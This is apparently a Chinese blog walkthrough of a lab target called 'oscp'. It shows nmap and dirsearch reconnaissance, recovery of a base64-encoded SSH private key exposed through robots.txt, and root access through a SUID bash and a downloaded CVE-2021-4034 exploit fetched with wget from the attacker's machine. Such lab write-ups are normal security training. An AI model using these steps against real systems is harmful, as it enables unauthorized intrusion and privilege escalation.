Nextcyber oscp-oscp

Nextcyber oscp-oscp

1.环境配置

下载openvpn配置文件

image-20250721191637441

得到zip文件后进行解压

image-20250721191757409

先 chmod 777 ./* 给一下执行权限

openvpn进行启用

openvpn asynic0.ovpn

如果没有openvpn,使用apt进行下载:

apt install openvpn

查看本地代理ip

image-20250721192131537

得到代理ip:10.132.0.175

查看靶机ip

10.18.30.113

2.信息收集

使用nmap收集信息

端口探测

nmap -sT --min-rate 10000 -p- 10.18.30.113
image-20250723211545856

详细信息探测TCP扫描

  • -sT:以TCP协议进行扫描
  • -sV:探测各服务的版本
  • -sC:用默认的脚本进行扫描
  • -O:探测操作系统的版本
nmap -sT -sV -sC -O -p22,80,33060 10.18.30.113
image-20250723212033078

默认脚本扫描

  • --script=vuln:nmap的漏洞脚本目录,vuln是漏洞的意思
nmap --script=vuln -p22,80,33060 10.18.30.113
image-20250723212146957

目录爆破

python dirsearch.py -u http://10.18.30.113
image-20250723212229688

3.Web渗透

http://10.18.30.113

在主页上发现一段英文,借助翻译软件,找到有用信息:

这个盒子上唯一的用户是 “oscp”

得到了用户名:oscp

看一下/robots.txt页面,发现/secret.txt,访问得到一大串base64,写入base64.txt,进行解码:

base64 -d base64.txt > decode.txt

得到openssh的私钥,将decode.txt改名为id_rsa,可以尝试ssh登录

ssh -i id_rsa oscp@10.18.30.113
image-20250723213156190

成功登录

4.bash提权

使用find命令查找系统上运行的所有SUID可执行文件,发现可以通过bash提权,直接一个-p就可

不要用sudo,因为用sudo需要密码

find / -perm -u=s -type f 2>/dev/null
image-20250723213729144
bash -p
image-20250723213902016

5.psexec提权

可以看看也可以尝试psexec,直接使用脚本CVE-2021-4034

先在kali上开启web:

php -S 0:80

当ssh登陆进去后,cd到/tmp目录,因为tmp目录一般都会有权限

wget http://10.132.0.175/CVE-2021-4034.py
image-20250723214206658

发现有python3的环境

python3 --version     #Python 3.8.2

直接执行脚本:

python3 CVE-2021-4034.py
image-20250723214531831
posted @ 2025-07-23 21:46  Afa1rs  阅读(39)  评论(0)    收藏  举报